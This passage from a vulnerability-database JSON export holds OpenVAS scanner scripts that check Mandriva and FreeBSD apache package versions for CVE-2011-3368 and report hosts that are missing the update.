(apache)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2011:144 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-10/msg00017.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831460\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"MDVSA\", value:\"2011:144\");\n script_cve_id(\"CVE-2011-3368\");\n script_name(\"Mandriva Update for apache MDVSA-2011:144 (apache)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apache'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1|2009\\.0)\");\n script_tag(name:\"affected\", value:\"apache on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered and corrected in apache:\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\n matches for configuration of a reverse proxy, which allows remote\n attackers to send requests to intranet servers via a malformed URI\n containing an initial \\@ (at sign) character (CVE-2011-3368).\n\n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. The updated packages have been patched to correct this issue.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://store.mandriva.com/product_info.php?cPath=149&amp;amp;products_id=490\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-02T21:10:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-18T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70600", "href": "http://plugins.openvas.org/nasl.php?oid=70600", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "#\n#VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n apache\n apache+ssl\n apache+ipv6\n apache+mod_perl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n ru-apache-1.3\n ru-apache+mod_ssl\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://httpd.apache.org/security/vulnerabilities_13.html\nhttp://seclists.org/fulldisclosure/2011/Oct/232\nhttp://www.vuxml.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70600);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-18 11:02:14 +0200 (Tue, 18 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\");\n script_version(\"$Revision: 5963 $\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43.1.59_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache-1.3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache-1.3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070600", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070600", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apache19.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70600\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n apache\n apache+ssl\n apache+ipv6\n apache+mod_perl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n ru-apache-1.3\n ru-apache+mod_ssl\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://httpd.apache.org/security/vulnerabilities_13.html\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Oct/232\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 